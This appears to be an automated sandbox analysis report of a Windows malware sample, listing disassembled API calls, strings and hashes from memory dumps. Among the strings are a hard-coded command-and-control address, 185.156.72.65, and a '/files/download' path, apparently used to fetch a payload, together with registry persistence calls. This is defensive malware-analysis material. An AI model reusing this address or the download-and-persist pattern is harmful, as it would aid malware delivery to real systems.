                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                      • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0494C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0494C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0494C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0494C2FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: d19d3c771868f603bdc4c70fa1cf47813a2bd2109d9732880470e4b32eaa9460
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 1CB14571902209EFDF29DFA4C880DAEB7B9BF88314F16416AE8116B211D771FA51CF91
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                      APIs
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenSleepValue
                      • String ID: 185.156.72.65$185.156.72.65$mixone
                      • API String ID: 4111408922-485810328
                      • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                      • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04949E22), ref: 04949E50
                      • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04949E22), ref: 04949E5B
                      • GetModuleHandleW.KERNEL32(0042000C,?,?,04949E22), ref: 04949E6C
                      • GetProcAddress.KERNEL32(00000000,00420028), ref: 04949E7E
                      • GetProcAddress.KERNEL32(00000000,00420044), ref: 04949E8C
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04949E22), ref: 04949EAF
                      • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04949ECB
                      • CloseHandle.KERNEL32(0042D060,?,?,04949E22), ref: 04949EDB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID:
                      • API String ID: 2565136772-0
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 60f2d3ef1866f8ede7c1faaafbd31aa0a08048e47a3ccd64e449fc90f972ba62
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6A017571F80711ABE7205BB4FC0DF9B3AECAB88705B504135F905E2161DB74D9078A68
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction ID: 6d3a3cfc350efa397900819d80e266ca4b6c01479b302033a5c4270e7a4e237d
                      • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction Fuzzy Hash: E7B15A72A00365AFEB11CF64CC81BAE7BB9EF95314F244175ED04AF2A1D274B981C7A1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                      • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                        • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65$string too long
                      • API String ID: 2123813255-2459586365
                      • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                      • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 0040B837
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                      • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                      • _ValidateLocalCookies.LIBCMT ref: 0040B948
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                      APIs
                      • GetLastError.KERNEL32(?,?,0494BC22,0494B1C6,0494A9D7), ref: 0494BC39
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0494BC47
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0494BC60
                      • SetLastError.KERNEL32(00000000,0494BC22,0494B1C6,0494A9D7), ref: 0494BCB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: 8bef0b2f46639e42fdef6b3747fab779de8755c2fad88a4b41a30f1e551f9359
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: D501D8322096119EB7352BFCFCC5E5B2A58EBC567D7214339E524550F1EF51B8016284
                      APIs
                      • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                      • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 0494186C
                        • Part of subcall function 04949AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04949AF5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418A2
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049418D9
                      • Concurrency::cancel_current_task.LIBCPMT ref: 049419EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65
                      • API String ID: 2123813255-1765470537
                      • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction ID: d785850e2d3667b4c444f598f40c96018d7a3833132ec7e9d6bddf6031acaaf2
                      • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                      • Instruction Fuzzy Hash: A641C8B1A00305ABE7149FB4DC86F5AB6F8EFC9354F100639E95AD7280E771B944C7A1
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BBD3FB9F,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                      • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                      • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                      • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 004150D5
                      • __alloca_probe_16.LIBCMT ref: 0041519E
                      • __freea.LIBCMT ref: 00415205
                        • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      • __freea.LIBCMT ref: 00415218
                      • __freea.LIBCMT ref: 00415225
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                      • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                      • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04942D5F
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04942D74
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04942D82
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04942D9D
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04942DBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                      • String ID:
                      • API String ID: 2509773233-0
                      • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction ID: 175afa162c95cfeadb4e2da24863592be78a5309dce3feafc95c42142ec1e7ff
                      • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                      • Instruction Fuzzy Hash: D9310532B00004AFDB149F68DC40FAAB7A8FF88305F1541F9F905DB291DB31A906CB94
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04941622
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 4132704954-3011832937
                      • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction ID: 7258e5586a0b6b714f836cbf843b993ade46c735d2d5c04f1d01758bfd09cb40
                      • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                      • Instruction Fuzzy Hash: 47217C70F003448AE730DF79E80ABA6B3A0FF95308FA44279D8485B261DBB565C6CB19
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004013BB
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                      • API String ID: 2296764815-3011832937
                      • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                      • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                      • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                      • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                      • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                      • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                      APIs
                      • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04959996
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04959BE8
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04959C2E
                      • GetLastError.KERNEL32 ref: 04959CD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction ID: ac4ae00053e98a5e680b4bc9fec160e7e4d4493f6071aace53cde3eeb8c891ce
                      • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                      • Instruction Fuzzy Hash: FED15DB5E00248DFDB15CFA8D8809EDBBF5FF49314F24456AE85AEB261D630A941CB50
                      APIs
                      • GetConsoleOutputCP.KERNEL32(BBD3FB9F,00000000,00000000,00000000), ref: 0041972F
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                      • GetLastError.KERNEL32 ref: 00419A6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                      • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                      • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04941C6C
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04941C8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID:
                      • API String ID: 3197321146-0
                      • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction ID: 4dca8ee12fc941249610a2b83ebfa9bb9639dbb1437fa16a71cb8a2fad8c4bfb
                      • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                      • Instruction Fuzzy Hash: F3C139B09002199FEB24DF64CC89FE9B7B8FF89304F1041E9E509A7290D775AA85CF95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: bdde06f235a269d078468b2cf144f212e7cf328a5c8ff44ed6905d2f0b42bfa6
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8251D3B2605606AFEB298F10D888FBB73A9EFC4314F14497DDA054B690E731FA50DB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
